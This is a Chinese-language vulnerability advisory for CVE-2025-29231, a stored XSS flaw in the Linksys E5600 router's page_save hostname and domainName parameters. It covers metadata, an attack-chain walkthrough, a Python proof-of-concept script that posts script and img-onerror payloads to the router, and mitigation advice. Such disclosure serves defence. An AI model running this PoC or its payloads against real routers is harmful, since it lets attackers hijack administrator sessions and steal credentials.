CVE-2025-29231 | Linksys E5600 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-29231

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Linksys E5600 V1.1.0.26

漏洞概述

CVE-2025-29231是Linksys E5600 V1.1.0.26路由器固件中发现的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于路由器的page_save组件中，攻击者可以通过在hostname和domainName参数中注入恶意JavaScript或HTML代码来实现持久化的跨站脚本攻击。由于漏洞属于存储型，恶意代码会被永久保存在路由器系统中，当其他用户访问受影响页面时，恶意脚本会自动执行，从而窃取用户会话信息、劫持用户操作或进行其他恶意行为。此漏洞的CVSS评分为6.1，属于中等严重程度，攻击复杂度低但需要用户交互才能触发。攻击者无需任何认证即可注入恶意载荷，但需要诱导受害者访问触发点。由于该漏洞影响的是家用路由器设备，攻击成功后可能导致企业内部网络凭证泄露或家庭用户隐私信息被窃取。

技术细节

该存储型XSS漏洞位于Linksys E5600路由器的page_save组件中，具体受影响的参数包括hostname和domainName。漏洞的根本原因在于路由器Web管理界面未能对用户输入进行充分的输入验证和输出编码。当攻击者通过HTTP请求向page_save组件提交包含恶意脚本的内容时，这些数据会被直接存储在路由器的配置中而未经过滤。在后续页面加载或相关功能调用时，存储的恶意代码会被重新输出到HTML响应中，被用户浏览器作为可执行脚本解析执行。攻击者可以利用此漏洞执行任意JavaScript代码，包括窃取Cookie、会话令牌，修改页面内容显示钓鱼信息，或诱导用户执行其他操作。由于路由器管理界面通常需要管理员权限访问，攻击者可能首先需要通过其他方式获取管理权限，或者利用路由器本身的默认凭证问题。攻击成功后，恶意脚本将在管理员访问管理界面时自动执行，可能导致管理员凭证被发送到攻击者控制的服务器。

攻击链分析

STEP 1

步骤1

攻击者识别目标Linksys E5600路由器，并访问其Web管理界面的page_save组件

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS载荷，如<script>alert(document.cookie)</script>

STEP 3

步骤3

攻击者通过HTTP POST请求将恶意载荷注入到hostname或domainName参数中

STEP 4

步骤4

路由器未能对输入进行有效过滤，将恶意代码存储在系统配置中

STEP 5

步骤5

管理员或受害者访问受影响页面时，存储的恶意脚本被浏览器执行

STEP 6

步骤6

恶意脚本窃取用户会话Cookie、凭据或其他敏感信息并发送到攻击者服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-29231 PoC - Linksys E5600 Stored XSS
# Target: Linksys E5600 V1.1.0.26
# Component: page_save (hostname/domainName parameters)

target_ip = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
target_url = f"http://{target_ip}/page_save"

# Malicious payload - Stored XSS via hostname parameter
xss_payload = "<script>alert(document.cookie)</script>"

def exploit_stored_xss():
    """
    Exploit the stored XSS vulnerability in Linksys E5600
    by injecting malicious JavaScript into hostname/domainName parameters
    """
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    
    # Payload for hostname parameter
    data = {
        "hostname": xss_payload,
        "domainName": "<img src=x onerror=alert('XSS')>",
        "submit_button": "index",
        "change_action": "apply"
    }
    
    try:
        print(f"[*] Targeting: {target_url}")
        print(f"[*] Injecting XSS payload into hostname parameter...")
        
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully!")
            print("[+] XSS payload stored in router configuration")
            print("[+] Payload will execute when admin accesses affected page")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    exploit_stored_xss()

影响范围

Linksys E5600 V1.1.0.26

防御指南

临时缓解措施

在官方补丁发布之前，建议禁用路由器的远程Web管理功能，仅允许通过本地网络访问管理界面。同时，定期检查路由器配置是否被篡改，避免使用公共WiFi网络访问路由器管理界面。对于必须访问管理界面的场景，建议使用HTTPS连接并启用双因素认证（如果设备支持）。此外，可以考虑部署网络入侵检测系统监控异常的HTTP请求模式。